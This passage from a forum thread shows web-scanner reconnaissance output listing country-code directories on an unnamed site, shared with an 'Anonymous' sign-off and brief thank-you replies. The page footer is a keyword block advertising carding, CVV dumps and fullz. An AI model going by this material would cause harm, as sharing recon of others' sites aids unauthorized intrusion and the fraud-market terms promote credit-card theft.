+ OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
+ OSVDB-3092: /ba/: This might be interesting... potential country code (Bosnia And Herzegovina)
+ OSVDB-3092: /bw/: This might be interesting... potential country code (Botswana)
+ OSVDB-3092: /bv/: This might be interesting... potential country code (Bouvet Island)
+ OSVDB-3092: /br/: This might be interesting... potential country code (Brazil)
+ OSVDB-3092: /io/: This might be interesting... potential country code (British Indian Ocean Territory)
+ OSVDB-3092: /bn/: This might be interesting... potential country code (Brunei Darussalam)
+ OSVDB-3092: /bg/: This might be interesting... potential country code (Bulgaria)
+ OSVDB-3092: /bf/: This might be interesting... potential country code (Burkina Faso)
+ OSVDB-3092: /bi/: This might be interesting... potential country code (Burundi)
+ OSVDB-3092: /kh/: This might be interesting... potential country code (Cambodia)
+ OSVDB-3092: /cm/: This might be interesting... potential country code (Cameroon)
+ OSVDB-3092: /ca/: This might be interesting... potential country code (Canada)
+ OSVDB-3092: /cv/: This might be interesting... potential country code (Cape Verde)
+ OSVDB-3092: /ky/: This might be interesting... potential country code (Cayman Islands)
+ OSVDB-3092: /cf/: This might be interesting... potential country code (Central African Republic)
+ OSVDB-3092: /td/: This might be interesting... potential country code (Chad)
+ OSVDB-3092: /cl/: This might be interesting... potential country code (Chile)
+ OSVDB-3092: /cn/: This might be interesting... potential country code (China)
+ OSVDB-3092: /cx/: This might be interesting... potential country code (Christmas Island)
+ OSVDB-3092: /cc/: This might be interesting... potential country code (Cocos (keeling) Islands)
+ OSVDB-3092: /co/: This might be interesting... potential country code (Colombia)
+ OSVDB-3092: /km/: This might be interesting... potential country code (Comoros)
+ OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
+ OSVDB-3092: /cd/: This might be interesting... potential country code (The Democratic Republic Of The Congo)
+ OSVDB-3092: /ck/: This might be interesting... potential country code (Cook Islands)
+ OSVDB-3092: /cr/: This might be interesting... potential country code (Costa Rica)
+ OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
+ OSVDB-3092: /hr/: This might be interesting... potential country code (Croatia)
+ OSVDB-3092: /cu/: This might be interesting... potential country code (Cuba)
+ OSVDB-3092: /cy/: This might be interesting... potential country code (Cyprus)
+ OSVDB-3092: /cz/: This might be interesting... potential country code (Czech Republic)
+ OSVDB-3092: /dk/: This might be interesting... potential country code (Denmark)
+ OSVDB-3092: /dj/: This might be interesting... potential country code (Djibouti)
ENJOY :))
WE ARE LEGION....
emailsnipper is offline   Reply With Quote
  #2 Old 08-01-2015, 03:40 PM
lee xiang
 
lee xiang's Avatar
 
Join Date: Aug 2015
Posts: 4
Contact: 658707874
lee xiang is an unknown quantity at this point
Default nice share

good share brother
lee xiang is offline   Reply With Quote
  #3 Old 08-09-2015, 09:26 PM
anas111
 
anas111's Avatar
 
Join Date: Dec 2014
Posts: 27
anas111 is an unknown quantity at this point
Default

thankssssssss
anas111 is offline   Reply With Quote
Reply

Tags
anonymous

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz